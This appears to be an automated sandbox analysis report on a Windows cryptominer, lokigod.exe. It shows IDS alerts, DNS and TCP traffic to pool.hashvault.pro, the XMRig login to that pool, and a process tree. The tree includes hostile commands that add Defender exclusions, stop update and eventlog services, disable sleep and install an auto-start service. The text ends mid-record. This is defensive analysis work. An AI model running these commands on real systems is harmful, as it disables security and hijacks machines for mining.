                                      KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2024-12-04T17:05:08.732115+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.5 | 51172 | 1.1.1.1 | 53 | UDP
                                      2024-12-04T17:05:09.724782+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.5 | 51172 | 1.1.1.1 | 53 | UDP
                                      2024-12-04T17:05:12.220760+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.5 | 49704 | 37.203.243.102 | 443 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 4, 2024 17:05:09.784760952 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:09.784804106 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:09.784882069 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:09.785099983 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:09.785115004 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.216128111 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.217545033 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:12.217562914 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.219012976 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.219178915 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:12.220556021 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:12.220627069 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.271626949 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:12.271641016 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:12.318494081 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:13.487190008 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:13.537209034 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:16.778167009 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:16.818579912 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:37.819400072 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:37.865582943 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:05:59.912735939 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:05:59.959477901 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:06:01.269285917 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:06:01.318892956 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:06:21.984054089 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:06:22.037717104 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:06:44.522547960 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:06:44.569199085 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:07:01.276937962 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:07:01.319281101 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Dec 4, 2024 17:07:06.470835924 CET | 443 | 49704 | 37.203.243.102 | 192.168.2.5
                                      Dec 4, 2024 17:07:06.522424936 CET | 49704 | 443 | 192.168.2.5 | 37.203.243.102
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 4, 2024 17:05:08.732115030 CET | 51172 | 53 | 192.168.2.5 | 1.1.1.1
                                      Dec 4, 2024 17:05:09.724781990 CET | 51172 | 53 | 192.168.2.5 | 1.1.1.1
                                      Dec 4, 2024 17:05:09.762593031 CET | 53 | 51172 | 1.1.1.1 | 192.168.2.5
                                      Dec 4, 2024 17:05:10.166341066 CET | 53 | 51172 | 1.1.1.1 | 192.168.2.5
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Dec 4, 2024 17:05:08.732115030 CET | 192.168.2.5 | 1.1.1.1 | 0x1d0e | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 17:05:09.724781990 CET | 192.168.2.5 | 1.1.1.1 | 0x1d0e | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Dec 4, 2024 17:05:09.762593031 CET | 1.1.1.1 | 192.168.2.5 | 0x1d0e | No error (0) | pool.hashvault.pro | | 37.203.243.102 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 17:05:09.762593031 CET | 1.1.1.1 | 192.168.2.5 | 0x1d0e | No error (0) | pool.hashvault.pro | | 5.188.137.200 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 17:05:10.166341066 CET | 1.1.1.1 | 192.168.2.5 | 0x1d0e | No error (0) | pool.hashvault.pro | | 37.203.243.102 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 17:05:10.166341066 CET | 1.1.1.1 | 192.168.2.5 | 0x1d0e | No error (0) | pool.hashvault.pro | | 5.188.137.200 | A (IP address) | IN (0x0001) | false
                                      Dec 4, 2024 17:05:16.703939915 CET | 1.1.1.1 | 192.168.2.5 | 0x2e22 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.238.0 | A (IP address) | IN (0x0001) | false
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49704 | 37.203.243.102 | 443 | 7636 | C:\Windows\System32\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data (ASCII decoding of the captured stream)
                                      2024-12-04 16:05:12 UTC | 601 | OUT | {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"8B8pnVySzjohWKuUnX7pPTKMQWXYgGWr51zZFdE5wfgDGyv9xHLvkXAhsZa7rShmD8Pu2vny9HrpBCqfUfE1iZ5BCZvzhfz","pass":"6238110659","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","r
                                      2024-12-04 16:05:13 UTC | 732 | IN | {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"25dc24fa-bd57-467b-a945-5712681cf09c","job":{"blob":"1010b7fbc1ba06bf275d2a0dc4905c46798484fca82d595c80733867ffe2d3f9a1dc16c80c045300000000c3e75ec082db268b20b13f611c62f1c588b2c1c37cb9a54d429d0312a151250
                                      2024-12-04 16:05:16 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bbfbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b7017afc2e2d6c02be7f9b5d5b171501ba5b262374bb9b61a5710b9804b4ed1e04","job_id":"c1271a84-65ba-41ad-a72d-b5a95d201c86","ta
                                      2024-12-04 16:05:37 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d1fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b4732c92a7304963c3009a537da6df6836a1446c0deafb87a8500d6b2db4ad2507","job_id":"1a94a080-37d2-4e28-b5e0-d6bff9c3f999","ta
                                      2024-12-04 16:05:59 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000006d052a7bea96f5ecf1e6efb21d89a2f9171f32b207e51c1514c89127779b51f90e","job_id":"2ae22b41-3ad0-43c2-83fd-1eda164afff9","ta
                                      2024-12-04 16:06:01 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7fbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000007a63daa059e7cc1abe605ed5e08cfa53f8ae638ec20d579ef1ffd6a192f1bfc90e","job_id":"2262c325-3091-4a72-bd67-5f6c09920d5e","ta
                                      2024-12-04 16:06:21 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fdfbc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000906feed808785f171f774f05db7fb34ff5a6b72fa5326d3bfed43e90e7c918761d","job_id":"59158b25-6e82-440a-bc66-e4cb3c47988b","ta
                                      2024-12-04 16:06:44 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"101093fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b1314b7f362e32128c3297f45d72d61b39ca6ea163e4dd4652731b3241d777a128","job_id":"50ed92bc-7e4d-450a-8692-68685784e4d1","ta
                                      2024-12-04 16:07:01 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"101093fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000004dac1b0bb0e99e888beb52695907556206c37e58fd428cb85386fdf01060888c28","job_id":"a6fa63d7-fe9f-4c5f-bd84-a82dde876ced","ta
                                      2024-12-04 16:07:06 UTC | 471 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a9fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c8680000000055fe68efde81ec861932b628b77f2720fb0f90dc2c716b0a2718ddaa707e3f2d30","job_id":"286d1c35-595d-479a-a93e-759454cdcd18","ta



                                      Target ID:0
                                      Start time:11:04:57
                                      Start date:04/12/2024
                                      Path:C:\Users\user\Desktop\lokigod.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\lokigod.exe"
                                      Imagebase:0x7ff683c20000
                                      File size:5'265'920 bytes
                                      MD5 hash:769EA3D0E0CF22EAA7526A89C0F438CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:11:04:57
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:11:04:58
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff64efc0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\wusa.exe
                                      Wow64 process (32bit):false
                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff786ec0000
                                      File size:345'088 bytes
                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:10
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe delete "LBFXRZGB"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe start "LBFXRZGB"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      Imagebase:0x7ff721ec0000
                                      File size:5'265'920 bytes
                                      MD5 hash:769EA3D0E0CF22EAA7526A89C0F438CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 76%, ReversingLabs
                                      Has exited:true

                                      Target ID:35
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff64efc0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:11:05:06
